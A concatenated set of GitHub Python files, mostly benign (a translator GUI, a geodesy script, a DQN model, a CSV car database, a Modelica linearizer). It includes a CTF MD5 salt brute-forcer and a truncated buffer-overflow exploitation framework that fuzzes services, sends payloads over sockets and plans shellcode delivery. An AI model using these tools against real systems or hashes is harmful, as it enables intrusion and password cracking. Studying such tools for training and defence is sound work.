{"seq_id":"44905472441","text":"from tkinter import *\r\nfrom tkinter import messagebox\r\nimport BT\r\nimport sys\r\n\r\ndef action():\r\n # Get the contents of the input box\r\n data = entry.get().strip()\r\n output = BT.work(data)\r\n message = messagebox.showinfo(title='Translation result', message='Translation result:\\n' + output)\r\n print(message)\r\n\r\ndef exit():\r\n # Exit\r\n sys.exit(0)\r\n\r\n# Work in progress...\r\ndef actWin():\r\n root = Tk()\r\n root.geometry('150x100+800+400')\r\n root.resizable(False,False)\r\n root.title('Status')\r\n Label(root, text = 'Running...', font = ('黑体',13)).grid(padx=30, pady=70)\r\n root.mainloop()\r\n\r\nif __name__ == '__main__':\r\n \r\n # Instantiate Tk\r\n root = Tk()\r\n \r\n\r\n # Set window position and size\r\n root.geometry('500x300+800+400')\r\n\r\n # Whether the window is resizable\r\n root.resizable(False,False)\r\n\r\n # Set the title\r\n root.title('Baidu Translate')\r\n\r\n # Set labels; grid --> lay out on the grid\r\n Label(root, text = 'Enter a word: ', font = ('黑体',13)).grid(padx=30, pady=70)\r\n Label(root, text = ' Created by BinL', font = ('黑体',10)).grid(row=4, column=1,pady=30)\r\n Label(root, text = 'Ver 0.0.1', font = ('黑体',10)).grid(row=2, column=0)\r\n\r\n # Input box\r\n entry = Entry(root, width=40)\r\n entry.grid(row=0,column=1)\r\n\r\n\r\n # Button 1\r\n button1 = Button(root, text = 'Run', width=20, command=action)\r\n button1.grid(row=2,column=1)\r\n\r\n\r\n\r\n # Main event loop\r\n 
root.mainloop()","repo_name":"BinL233/BaiduTranslator","sub_path":"BaiduTranslator.py","file_name":"BaiduTranslator.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40843305957","text":"from __future__ import print_function\nimport sys\nimport os\nsys.path.append(os.getcwd() + \"/../../\")\n\n# Import Python Modules\nfrom CONVGF.utility import env2pme\nfrom CONVGF.utility import read_convolution_file\nimport numpy as np\n\n#### USER INPUT ####\n\nharmonic=\"M2\"\noutput_directory = (\"./output/\")\nfilename=(output_directory + \"cn_OceanOnly_\" + harmonic + \"_cm_convgf_GOT410c_PREM.txt\")\npme_file=(output_directory + \"pme_OceanOnly_\" + harmonic + \"_cm_convgf_GOT410c_PREM.txt\")\n\n#### BEGIN CODE ####\n\n# Create output directory, if it does not yet exist\nif not (os.path.isdir(output_directory)):\n os.makedirs(output_directory)\n\nsta,lat,lon,eamp,epha,namp,npha,vamp,vpha = read_convolution_file.main(filename)\n\n# Perform the Conversion\nsmmjr,smmnr,theta = env2pme.main(eamp,epha,namp,npha)\n\n# Force Theta Positive\ntheta[theta < 0.] += 360.\n\n# Remove Duplicate Stations\nunique_sta, usta_idx = np.unique(sta,return_index=True)\nsta = sta[usta_idx]; lat = lat[usta_idx]; lon = lon[usta_idx]; eamp = eamp[usta_idx]; epha = epha[usta_idx]\nnamp = namp[usta_idx]; npha = npha[usta_idx]; vamp = vamp[usta_idx]; vpha = vpha[usta_idx]; smmjr = smmjr[usta_idx]\nsmmnr = smmnr[usta_idx]; theta = theta[usta_idx]\n\n# Prepare Output Files\npme_head = (\"../../output/Convolution/pme_head.txt\")\npme_body = (\"../../output/Convolution/pme_body.txt\")\n\n# Prepare Data for Output (as Structured Array)\nall_pme_data = np.array(list(zip(sta,lat,lon,theta,smmjr,smmnr,eamp,epha,namp,npha,vamp,vpha)), dtype=[('sta','U25'), \\\n ('lat',float),('lon',float),('theta',float),('smmjr',float),('smmnr',float),('eamp',float),('epha',float), \\\n ('namp',float),('npha',float),('vamp',float),('vpha',float)])\n\n# Write Header Info to File\nhf = open(pme_head,'w')\npme_str = 'Station Lat(+N,deg) Lon(+E,deg) Direction(deg) Semi-Major(mm) Semi-Minor(mm) E-Amp(mm) E-Pha(deg) N-Amp(mm) N-Pha(deg) V-Amp(mm) V-Pha(deg) \\n'\nhf.write(pme_str)\nhf.close()\n\n# Write PME Results to File\n#f_handle = open(pme_body,'w')\nnp.savetxt(pme_body,all_pme_data,fmt=[\"%s\"]+[\"%.8f\",]*11,delimiter=\" \")\n#f_handle.close()\n\n# Combine Header and Body Files\nfilenames_pme = [pme_head, pme_body]\nwith open(pme_file,'w') as outfile:\n for fname in filenames_pme:\n with open(fname) as infile:\n outfile.write(infile.read())\n \n# Remove Header and Body Files\nos.remove(pme_head)\nos.remove(pme_body)\n\n\n","repo_name":"hrmartens/LoadDef","sub_path":"utility/pmes/run_env2pme.py","file_name":"run_env2pme.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"21"} +{"seq_id":"23110298801","text":"import tensorflow as tf\nimport tensorflow.contrib.slim as slim\n\n\nclass QNetwork(object):\n\n def __init__(self, n_hidden, n_actions, learning_rate=0.0001):\n # The network receives a frame from the game, flattened into an array.\n # It then resizes and processes it through four convolutional layers.\n self.scalar_input = tf.placeholder(shape=[None, 21168], dtype=tf.float32)\n self.image_in = tf.reshape(self.scalar_input, shape=[-1, 84, 84, 3])\n self.conv1 = slim.conv2d(inputs=self.image_in, num_outputs=32,\n kernel_size=[8, 8], stride=[4, 4], 
padding='VALID',\n biases_initializer=None)\n self.conv2 = slim.conv2d(inputs=self.conv1, num_outputs=64,\n kernel_size=[4, 4], stride=[2, 2], padding='VALID',\n biases_initializer=None)\n self.conv3 = slim.conv2d(inputs=self.conv2, num_outputs=64,\n kernel_size=[3, 3], stride=[1, 1], padding='VALID',\n biases_initializer=None)\n self.conv4 = slim.conv2d(inputs=self.conv3, num_outputs=n_hidden,\n kernel_size=[7, 7], stride=[1, 1], padding='VALID',\n biases_initializer=None)\n\n # take the output from the final convolutional layer and split it into\n # separate advantage and value streams\n self.stream_ac, self.stream_vc = tf.split(self.conv4, 2, 3)\n self.stream_a = slim.flatten(self.stream_ac)\n self.stream_v = slim.flatten(self.stream_vc)\n xavier_init = tf.contrib.layers.xavier_initializer()\n self.aw = tf.Variable(xavier_init([n_hidden // 2, n_actions]))\n self.vw = tf.Variable(xavier_init([n_hidden // 2, 1]))\n self.advantage = tf.matmul(self.stream_a, self.aw)\n self.value = tf.matmul(self.stream_v, self.vw)\n\n # then combine them together to get our final Q-values\n self.q_out = self.value + tf.subtract(self.advantage, tf.reduce_mean(self.advantage, axis=1, keep_dims=True))\n self.predict = tf.argmax(self.q_out, 1)\n\n # obtain the loss by taking the sum of squares difference between\n # the target and predicted Q-values\n self.target_q = tf.placeholder(shape=[None], dtype=tf.float32)\n self.actions = tf.placeholder(shape=[None], dtype=tf.int32)\n self.actions_onehot = tf.one_hot(self.actions, n_actions, dtype=tf.float32)\n\n self.q = tf.reduce_sum(tf.multiply(self.q_out, self.actions_onehot), axis=1)\n\n self.td_error = tf.square(self.target_q - self.q)\n self.loss = tf.reduce_mean(self.td_error)\n self.trainer = tf.train.AdamOptimizer(learning_rate=learning_rate)\n self.update_op = self.trainer.minimize(self.loss)\n","repo_name":"markmo/dltemplate","sub_path":"src/rl/survey_of_methods/dqn/model_setup.py","file_name":"model_setup.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"21"}
{"seq_id":"29253588908","text":"import csv\n\ncsv_file = []\n\n# Column names of the car table stored in 'new 1.csv'\nCOLUMNS = ['VIN-номер', 'Гос_номер', 'Марка', 'Модель', 'Год_выпуска', 'Мощн_дв', 'Пробег', 'Кол_вл', 'Цена']\n\n\n# Open the csv file\ndef file_open():\n global csv_file\n with open('new 1.csv', \"r\", newline=\"\", encoding=\"utf-8\") as file:\n reader = csv.DictReader(file, delimiter=';')\n for row in reader:\n print(row)\n csv_file.append(row)\n print('File opened. Records:', len(csv_file))\n\n\n# Add a record\ndef insert(vin, gos, mar, mod, god, mosh, probeg, vladel, zena):\n global csv_file\n try:\n csv_file.append(dict(zip(COLUMNS, [vin, gos, mar, mod, god, mosh, probeg, vladel, zena])))\n except Exception as e:\n return f'Error while adding a new record: {e}'\n return 'Record added.'\n\n\n# Delete by VIN number\ndef drop_by_arg(val, col_name='VIN-номер'):\n global csv_file\n csv_file = list(filter(lambda x: x[col_name] != val, csv_file))\n return f'Rows with value \"{val}\" in column \"{col_name}\" deleted.'\n\n\n# Search by make (pass col_name to search by model, licence plate, year, ...)\ndef find(val, col_name='Марка'):\n print(*list(filter(lambda x: x[col_name] == val, csv_file)))\n\n\n# Car with the highest mileage\ndef find_max_mileage(col_name='Пробег'):\n if csv_file:\n print(max(csv_file, key=lambda x: float(x[col_name])))\n\n\n# Save\ndef save():\n with open('new 1.csv', \"w\", encoding=\"utf-8\", newline=\"\") as file:\n writer = csv.DictWriter(file, delimiter=\";\", fieldnames=COLUMNS)\n writer.writeheader()\n writer.writerows(csv_file)\n print(\"Data saved!\")\n\n\n# Print the table (or the container type if nothing is loaded)\ndef show_csv():\n if len(csv_file) == 0:\n print(type(csv_file))\n else:\n print('{:<20}{:<12}{:<10}{:<10}{:<8}'.format(*COLUMNS[:5]))\n for el in csv_file:\n print('{:<20}{:<12}{:<10}{:<10}{:<8}'.format(*(el[c] for c in COLUMNS[:5])))\n","repo_name":"GudkovaO/07_mod-1-","sub_path":"mod1.py","file_name":"mod1.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"25309898358","text":"import os\nimport tempfile\nimport typing as t\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas as pd\nfrom OMPython import OMCSessionZMQ\nfrom pyfmi import fmi, load_fmu\n\nfrom mpc_optimization.fmu_source import FmuSource, ModelicaModelInfo\nfrom mpc_optimization.utils import ModelVariables\n\n\ndef _generate_control_csv(control_df: pd.DataFrame) -> Path:\n # fd, filepath = tempfile.mkstemp()\n filepath = '/home/developer/ipynotebooks/inputs.csv'\n try:\n # renamer = dict(zip(control_df.columns, map(lambda x: f\"'u_{x}'\", control_df.columns)))\n control_df.to_csv(filepath, index=False, line_terminator=',\\n', sep=',')\n except:\n os.remove(filepath)\n raise\n return Path(filepath)\n\n\ndef linearize_model(model_info: ModelicaModelInfo,\n initial_parameters: ModelVariables = dict(),\n control_df: t.Optional[pd.DataFrame] = None) -> fmi.FMUModelCS2:\n omc = 
OMCSessionZMQ()\n is_loaded: bool = omc.sendExpression(f'loadFile(\"{model_info.location}\")')\n if not is_loaded:\n raise RuntimeError(\"Could not load model: \")\n stopTime = 100\n path_to_csv = None\n if control_df is not None:\n path_to_csv = _generate_control_csv(control_df.reset_index())\n stopTime = control_df.index[-1]\n\n initial_parameters_flags = \"\".join([f'-override {var}={val}' for var, val in initial_parameters.items()])\n input_file_flags = f\"-csvInput {path_to_csv}\" if path_to_csv is not None else \"\"\n\n linearization_result = omc.sendExpression(\n f'linearize({model_info.name}, startTime=0, stopTime={stopTime}, stepSize=10, simflags=\"{initial_parameters_flags} {input_file_flags}\", outputFormat=\"csv\")'\n )\n\n if path_to_csv is not None:\n os.remove(path_to_csv)\n\n if linearization_result is None or not len(linearization_result['resultFile']):\n print(linearization_result)\n raise RuntimeError(\"Could not linearize a model: \")\n\n fmu_path = FmuSource.from_modelica(\n ModelicaModelInfo(Path(\"linearized_model.mo\"), \"linearized_model\")).fmu_path\n model = load_fmu(str(fmu_path))\n\n # FMU exported from OpenModelica doesn't estimate from time 0,\n # so simulation from 0 to 0 helps\n opts = model.simulate_options()\n opts['silent_mode'] = True\n model.simulate(0, 0, options=opts)\n\n return model\n\n\ndef _read_model_matrix(model: fmi.FMUModelCS2, matrix_name: str, shape: t.Tuple[int, int]):\n M = np.zeros(shape)\n for i in range(1, shape[0] + 1):\n for j in range(1, shape[1] + 1):\n M[i - 1, j - 1] = model.get(f'{matrix_name}[{i},{j}]')\n return M\n\n\ndef get_linear_model_matrices(model: fmi.FMUModelCS2):\n x_num = int(model.get('n'))\n u_num = int(model.get('m'))\n y_num = int(model.get('p'))\n\n A = _read_model_matrix(model, 'A', (x_num, x_num))\n B = _read_model_matrix(model, 'B', (x_num, u_num))\n C = _read_model_matrix(model, 'C', (y_num, x_num))\n D = _read_model_matrix(model, 'D', (y_num, u_num))\n return A, B, C, D\n","repo_name":"Midren/MPC_for_battery_operation","sub_path":"python_libs/mpc_optimization/linearization.py","file_name":"linearization.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"}
{"seq_id":"72178383412","text":"# -*- coding: utf-8 -*-\r\nimport hashlib\r\n\r\n# target MD5 digest (lower-cased to match hexdigest() output) and the known salt\r\nm = '4850B7446BBB20AAD140E7B0A964A57D'.lower()\r\nk = '2453148193'\r\n\r\n\r\nEN = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\n\r\nen = \"abcdefghijklmnopqrstuvwxyz\"\r\n\r\nRU = \"АБВГДЕЁЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯ\"\r\n\r\nru = \"абвгдеёжзийклмнопрстуфхцчшщъыьэюя\"\r\n\r\ndigits = \"1234567890\"\r\n\r\nspace = \" \"\r\n\r\np = \",.-!?;:'\\\"/()\"\r\n\r\nop = \"+-*/:^()<>=\"\r\n\r\nall_spec = \"`~!@#$%^&*-_=+\\\\|/?.>,< '\\\";:[]{}\"\r\n\r\nclass ABCIterator:\r\n firstuse_flag = True\r\n stop = None\r\n\r\n def __init__(self, start=\"\", stop=None, start_len=None, stop_len=None, abc=en+EN+digits+all_spec):\r\n assert len(abc) > 0\r\n\r\n if start_len is not None:\r\n\r\n assert start_len > 0\r\n\r\n #assert start == \"\"\r\n\r\n self.current_str = list(abc[0]*start_len)\r\n\r\n else:\r\n\r\n self.current_str = list(filter(lambda x: x in abc, start))\r\n\r\n if stop_len is not None:\r\n\r\n assert (start_len is None) or (start_len <= stop_len)\r\n assert stop_len > 0\r\n\r\n self.stop = list(abc[0]*(stop_len+1)) # since the iterator works with half-open intervals\r\n\r\n else:\r\n\r\n if stop is not None: self.stop = list(filter(lambda x: x in abc, stop))\r\n\r\n self.abc = list(abc)\r\n\r\n def __iter__(self):\r\n\r\n return self\r\n\r\n def __next__(self):\r\n\r\n if (self.stop is not None) and (self.stop == self.current_str):\r\n\r\n raise StopIteration\r\n\r\n if self.current_str == []:\r\n\r\n self.current_str.append(self.abc[0])\r\n\r\n self.firstuse_flag = False\r\n\r\n return self.abc[0]\r\n\r\n elif self.firstuse_flag:\r\n\r\n self.firstuse_flag = False\r\n\r\n return \"\".join(self.current_str)\r\n\r\n offset = 0\r\n\r\n while offset < len(self.current_str):\r\n if self.current_str[offset] != self.abc[-1]:\r\n self.current_str[offset] = self.abc[self.abc.index(self.current_str[offset])+1]\r\n # special case for the half-open interval\r\n if (self.stop is not None) and (self.current_str == self.stop):\r\n raise StopIteration\r\n return \"\".join(self.current_str)\r\n self.current_str[offset] = self.abc[0]\r\n offset += 1\r\n self.current_str = [self.abc[0]] + self.current_str\r\n # same half-open-interval check again\r\n if (self.stop is not None) and (self.current_str == self.stop):\r\n raise StopIteration\r\n return \"\".join(self.current_str)\r\n\r\n#===============\r\nj = 0\r\nfor i in ABCIterator(start_len=1, stop_len=10):\r\n md = k + i\r\n # hash each candidate with a fresh MD5 object so every digest reflects its input\r\n mdd = hashlib.md5(md.encode()).hexdigest()\r\n j += 1\r\n if j % 1000000 == 0:\r\n print(j, len(i))\r\n if mdd == m:\r\n print(md)\r\n break\r\n","repo_name":"D1ment/ctf-python","sub_path":"bruteforce/generator_pass.py","file_name":"generator_pass.py","file_ext":"py","file_size_in_byte":2842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"14942883055","text":"#!/usr/bin/python\nimport socket\nimport time\nfrom binascii import unhexlify\nfrom re import search, split\nfrom struct import pack\nfrom subprocess import run\n\nfrom pwn import asm\n\n# Error codes\nBOFErrorSuccess = 0\nBOFErrorFailure = -1\nBOFErrorConnectionRefused = -2\nBOFErrorConnectionReset = -3\nBOFErrorConnectionTimeout = -4\nBOFErrorServiceAlive = -5\nBOFErrorNoSpace = -6\nBOFErrorInvalid = -7\n\nBOFAllHex = ['01', '02', '03', '04', '05', '06', '07', '08', '09', '0a', '0b', '0c', '0d', '0e', '0f', '10', '11',\n '12', '13', '14', '15', '16', '17', '18', '19', '1a', '1b', '1c', '1d', '1e', '1f', '20', '21', '22',\n '23', '24', '25', '26', '27', '28', '29', '2a', '2b', '2c', '2d', '2e', '2f', '30', '31', '32', '33',\n '34', '35', '36', '37', '38', '39', '3a', '3b', '3c', '3d', '3e', '3f', '40', '41', '42', '43', '44',\n '45', '46', '47', '48', '49', '4a', '4b', '4c', '4d', '4e', '4f', '50', '51', '52', '53', '54', '55',\n '56', '57', '58', '59', '5a', '5b', '5c', '5d', '5e', '5f', '60', '61', '62', '63', '64', '65', '66',\n '67', '68', '69', '6a', '6b', '6c', '6d', '6e', '6f', '70', '71', '72', '73', '74', '75', '76', '77',\n '78', '79', '7a', '7b', '7c', '7d', '7e', '7f', '80', '81', '82', '83', '84', '85', '86', '87', '88',\n '89', '8a', '8b', '8c', '8d', '8e', '8f', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99',\n '9a', '9b', '9c', '9d', '9e', '9f', 'a0', 'a1', 'a2', 'a3', 'a4', 'a5', 'a6', 'a7', 'a8', 'a9', 'aa',\n 'ab', 'ac', 'ad', 'ae', 'af', 'b0', 'b1', 'b2', 'b3', 'b4', 'b5', 'b6', 'b7', 'b8', 'b9', 'ba', 'bb',\n 'bc', 'bd', 'be', 'bf', 'c0', 'c1', 'c2', 'c3', 'c4', 'c5', 'c6', 'c7', 'c8', 'c9', 'ca', 'cb', 'cc',\n 'cd', 'ce', 'cf', 'd0', 'd1', 'd2', 'd3', 'd4', 'd5', 'd6', 'd7', 'd8', 'd9', 'da', 'db', 'dc', 'dd',\n 'de', 'df', 'e0', 'e1', 'e2', 'e3', 
'e4', 'e5', 'e6', 'e7', 'e8', 'e9', 'ea', 'eb', 'ec', 'ed', 'ee',\n 'ef', 'f0', 'f1', 'f2', 'f3', 'f4', 'f5', 'f6', 'f7', 'f8', 'f9', 'fa', 'fb', 'fc', 'fd', 'fe', 'ff']\n\n# Live prefix/suffix options\nBOFLiveOptions = [\"payload_len\", \"local_host\", \"remote_host\", \"local_port\", \"remote_port\"]\n\n\ndef live_option_long(option: str) -> bytes:\n return (\"BOFLive.\" + option).encode()\n\n\ndef execute(cmd: str) -> bytes:\n return run(cmd, shell=True, capture_output=True).stdout\n\n\ndef is_hex(integer: str) -> bool:\n return not search(r\"[^a-f0-9]\", integer)\n\n\ndef is_register(reg: str) -> bool:\n regs = ['ax', 'bx', 'cx', 'dx', 'bp', 'sp', 'si', 'di']\n if len(reg) != 3:\n return False\n if reg[0] != \"r\" and reg[0] != \"e\":\n return False\n for item in regs:\n if reg[1:] == item:\n return True\n return False\n\n\ndef bytes_escape_all(in_byte: bytes) -> list[str]:\n out_str = []\n for b in in_byte:\n out_str.append(''.join('\\\\x{:02x}'.format(b)))\n return out_str\n\n\ndef bytes_escape_all_str(in_bytes: bytes) -> str:\n return \"'{}'\".format(''.join('\\\\x{:02x}'.format(b) for b in in_bytes))\n\n\ndef split_list(lst: list, n: int) -> list[list]:\n d, r = divmod(len(lst), n)\n for i in range(n):\n si = (d + 1) * (i if i < r else r) + d * (0 if i < r else i - r)\n yield lst[si:si + (d + 1 if i < r else d)]\n\n\n# @class BOFHelper\n# @abstract Class performing simple buffer overflow against specified target.\n# @discussion This class exploits a basic buffer overflow (without ASLR, DEP, etc.), cover-\n# ing every step involved. With independent functions to handle fuzzing, EIP\n# location, bad character detection, shellcode generation, space expansion,\n# file generation, and, with everything gathered, exploit dispatch, it provides\n# maximum flexibility and customizability for almost any scenario. In addition\n# to prefixes and suffixes, it supports live headers to be sent before the payload,\n# which would be particularly useful when the attack surface is an HTTP request.\n# During the reconnaissance process, this program is designed with minimal user\n# interaction in mind. For instance, its automated bad character detection process\n# only requires the user to restart the service when prompted, with no need to\n# continuously investigate the ESP dump (until all critical bad characters are\n# found). It eventually generates a well-formatted Python 2 POC script based on\n# the information gathered so that the user can easily replicate the exploit.\n#\n# All other types of buffer overflow should be handled by subclasses of this\n# base class. Make sure to adhere to the structure and workflow of this class\n# and override all necessary functions.\n# @var interface The interface from which all data would be sent. The local would be obtained\n# based on the interface specified.\n# @var local_port The local port that the target would connect to once exploited.\n# @var ip The remote IP to connect to.\n# @var port The remote port to connect to.\n# @var header The live header that is appended before the payload. It could be altered based\n# on the circumstance of each send_data() request. Refer to send_data() for more\n# details.\n# All possible live options are listed in @BOFLiveOptions. 
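For example (an illustrative template, not taken from the original project): header = b\"POST /translate HTTP/1.1\\r\\nHost: BOFLive.remote_host\\r\\nContent-Length: BOFLive.payload_len\\r\\n\\r\\n\" would have its host and length fields substituted on every send. 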
To use one, simply\n # replace the relevant substring of the header with \"BOFLive.\" plus an option.\n # @var prefix Fixed prefix of the payload.\n # @var suffix Fixed suffix of the payload.\n # @var inc The step of increment during the fuzzing stage.\n # @var timeout The timeout for send_data() requests. Increase if your connection is slow.\n # @var recv Set to true only if the service responds to a request. Otherwise, it might\n # cause the program to hang.\n # @var ask_crash Prompt every time if the service has crashed instead of inferring it from the\n # result of send_data(). Set to true if your service can be connected to after\n # it crashes.\n # @var strict In some edge cases, the EIP can be controlled only with a payload of a certain\n # size. The program would try to find this value if it is set to true. Beware\n # that the process may require extensive use of a debugger and be very tedious.\n # @var verify Send an empty payload after every send_data() request to verify that the service\n # has crashed successfully. May be required in some edge cases.\n # @var debug Verbose logging.\n\n\nclass BOFHelper:\n def __init__(self, interface: str, local_port: int, ip: str, port: int, header: bytes = b\"\",\n prefix: bytes = b\"\", suffix: bytes = b\"\", inc: int = 200, timeout: float = 5.0,\n recv: bool = False, ask_crash: bool = False, strict: bool = False, verify: bool = False,\n debug: bool = True):\n self._interface = interface\n self._lPort = local_port\n self._lIP = execute(\"ip addr show %s | grep 'inet ' | awk '{print $2}' | cut -d '/' -f 1\" % self._interface) \\\n .decode().strip()\n self._ip = ip\n self._port = port\n self._header = header\n self._origHeader = header\n self._liveOptions = {}\n self._prefix = prefix\n self._suffix = suffix\n self._inc = inc # The step of increment in get_num_bytes(); the default of 200 is efficient for most services.\n self._timeout = timeout # Socket timeout in seconds.\n self._recv = recv\n self._askCrash = ask_crash\n self._strict = strict\n self._verify = verify\n self._debug = debug\n\n self._init_options()\n\n self._numBytes = 0\n self._numBytesObtained = False\n self._strictSizeFound = False\n self._eipOffset = 0\n self._eipObtained = False\n self._badChars = [\"00\"]\n self._badCharsFound = False\n self._shellCode = b\"\"\n self._shellCodeName = \"\"\n self._shellCodeGenerated = False\n self._espPadding = 0\n self._espPaddingSet = False\n self._firstStageASM = \"\"\n self._firstStage = b\"\"\n self._stackSpace = 0\n self._shellCodeInESP = True\n self._spaceExpanded = False\n self._eip = b\"\"\n self._exploit = b\"\"\n self._endPadding = 0\n self._fileGenerated = False\n\n def __del__(self):\n if not self._fileGenerated:\n self._step_log(\"Printing information...\")\n if self._strict and self._numBytesObtained:\n self._success_log(\"Strict payload size: %d\" % self._numBytes)\n if self._eipObtained:\n self._success_log(\"EIP Offset: %d\" % self._eipOffset)\n if self._espPaddingSet:\n self._success_log(\"ESP Padding: %d\" % self._espPadding)\n if self._badCharsFound:\n self._success_log(\"Bad characters: 0x%s\" % \" 0x\".join(self._badChars))\n if self._shellCodeGenerated and not self._shellCodeInESP:\n self._success_log((\"First stage shell code: %s\" % bytes_escape_all_str(self._firstStage))\n .replace(\"'\", \"\"))\n if self._spaceExpanded:\n self._success_log(\"Stack space: %d\" % self._stackSpace)\n if self._eip:\n self._success_log((\"Overridden EIP: %s\" % bytes_escape_all_str(self._eip)).replace(\"'\", \"\"))\n\n # Logs & Helpers\n\n def 
_input(self, text: str, debug: bool = False) -> str:\n if (not debug) or (debug and self._debug):\n return input(\"(*) \" + text).strip()\n\n def __log(self, text: str, debug: bool = False) -> None:\n if (not debug) or (debug and self._debug):\n print(text)\n\n def _func_log(self, text: str, debug: bool = False) -> None:\n self.__log(\"[-] \" + text, debug)\n\n def _success_log(self, text: str, debug: bool = False) -> None:\n self.__log(\"[+] \" + text, debug)\n\n def _debug_log(self, text: str) -> None:\n self.__log(\"(-) \" + text, True)\n\n def _step_log(self, text: str, debug: bool = False) -> None:\n self.__log(\"(+) \" + text, debug)\n\n def _prompt_log(self, text: str, debug: bool = False) -> None:\n self.__log(\"(*) \" + text, debug)\n\n def _warn_log(self, text: str, debug: bool = False) -> None:\n self.__log(\"(!) \" + text, debug)\n\n def _err_log(self, text: str, debug: bool = False) -> None:\n self.__log(\"(!!!) \" + text, debug)\n\n def _prompt_restart(self) -> None:\n self._prompt_log(\"Please restart the vulnerable application. Type anything to continue...\")\n input()\n\n def _prompt_debugger(self) -> None:\n self._prompt_log(\"GO! Fire up your debugger! Type anything to continue...\")\n input()\n\n # @function _init_options\n # @abstract Initialize each option of @self._liveOptions to specified values.\n # @result None.\n\n def _init_options(self) -> None:\n for option in BOFLiveOptions:\n full_option = live_option_long(option)\n if full_option in self._header:\n if option == \"local_host\":\n self._liveOptions[full_option] = self._lIP.encode()\n elif option == \"remote_host\":\n self._liveOptions[full_option] = self._ip.encode()\n elif option == \"local_port\":\n self._liveOptions[full_option] = bytes(self._lPort)\n elif option == \"remote_port\":\n self._liveOptions[full_option] = bytes(self._port)\n else:\n self._liveOptions[full_option] = b\"\"\n\n # @function _process_header_file\n # @abstract Process the header for use in generated POC.\n # @param header Original header.\n # @result Updated header.\n\n def _process_header_file(self, header: str) -> str:\n header = header.replace(live_option_long(\"payload_len\").decode(), \"' + str(len(payload)) + '\") \\\n .replace(live_option_long(\"local_host\").decode(), self._lIP) \\\n .replace(live_option_long(\"remote_host\").decode(), self._ip) \\\n .replace(live_option_long(\"local_port\").decode(), str(self._lPort)) \\\n .replace(live_option_long(\"remote_port\").decode(), str(self._port))\n return header\n\n # @function send_data\n # @abstract Helper function sending data to designated port on the target.\n # @discussion In this function, a socket is created to send the data in @buffer to @self._port.\n # The payload would be sent with the predefined prefix and suffix, and if the\n # request has timed out, it would be resent recursively (up to five times). If\n # the user has provided a header, its live options, if there is any, would be\n # updated based on the current request. To test if the service is open, simply\n # pass an empty (i.e. \"\") @buffer as the argument.\n # @param buffer Bytes object storing the data to be sent.\n # @param close Determines whether to close the socket. Set to false when sending the final\n # exploit.\n # @param trial Records the number of time this request has been resent. 
Set to 5 to disable\n # resending in case of socket timeout.\n # @result BOFErrorSuccess if succeeded; BOFErrorConnectionRefused if connection refused;\n # BOFErrorConnectionReset if connection reset; BOFErrorConnectionTimeout if socket\n # timed out.\n\n def send_data(self, buffer: bytes, trial: int = 3, close: bool = True) -> int:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(self._timeout)\n try:\n s.connect((self._ip, self._port))\n if self._origHeader:\n payload_len = live_option_long(\"payload_len\")\n if payload_len in self._origHeader:\n self._liveOptions[payload_len] = str(len(buffer) + len(self._prefix) + len(self._suffix)).encode()\n self._header = self._origHeader\n for option in self._liveOptions:\n self._header = self._header.replace(option, self._liveOptions[option])\n\n s.send(self._header + self._prefix + buffer + self._suffix)\n if self._recv:\n res = s.recv(1024).decode()\n self._debug_log(res)\n if close:\n s.close()\n\n if self._verify and buffer:\n time.sleep(1)\n return self.send_data(b\"\")\n\n except ConnectionRefusedError:\n return BOFErrorConnectionRefused\n\n except ConnectionResetError:\n return BOFErrorConnectionReset\n\n except socket.timeout:\n if trial < 5:\n return self.send_data(buffer, trial + 1)\n self._err_log(\"Could not connect to %s at port %s!\" % (self._ip, self._port))\n self._warn_log(\"Remember to start the service!\")\n return BOFErrorConnectionTimeout\n\n return BOFErrorSuccess\n\n # @function _check_crash\n # @abstract Check if the service has crashed, based on @error or user input.\n # @param error If @self._askCrash has not been set, the status of the service would be determined\n # based on it.\n # @result True if the service has crashed; False otherwise.\n\n def _check_crash(self, error: int) -> bool:\n if self._askCrash:\n ans = self._input(\"Did the service crash? (y/n): \").lower()\n if ans == 'y':\n return True\n return False\n if error == BOFErrorConnectionReset or error == BOFErrorConnectionRefused:\n return True\n return False\n\n # @function get_esp_padding\n # @abstract Ask for the ESP padding.\n # @result None.\n\n def get_esp_padding(self) -> None:\n ans = self._input(\"How many bytes are between EIP and ESP (blank to skip): \")\n if ans == \"\" or ans == \"q\":\n # a blank answer means zero padding; stop here instead of falling through to int(ans)\n self._espPadding = 0\n self._espPaddingSet = True\n return\n self._espPadding = int(ans)\n self._espPaddingSet = True\n\n # @function set_esp_padding\n # @abstract Sets the ESP padding.\n # @result None.\n\n def set_esp_padding(self, padding: int) -> None:\n self._espPadding = padding\n self._espPaddingSet = True\n\n # @function _fuzz_bytes_overflow\n # @abstract Private function for finding a rough number of bytes needed to overflow the service.\n # @discussion This function recursively sends buffers, incrementing in size each iteration by\n # @self._inc, to the service and checks if it has crashed. 
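As a worked example (with made-up numbers): for @self._inc = 200 the probe sizes grow 0, 200, 400, ..., and if the service first dies at the 1000-byte probe, the true threshold lies somewhere in the half-open interval (800, 1000]. 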
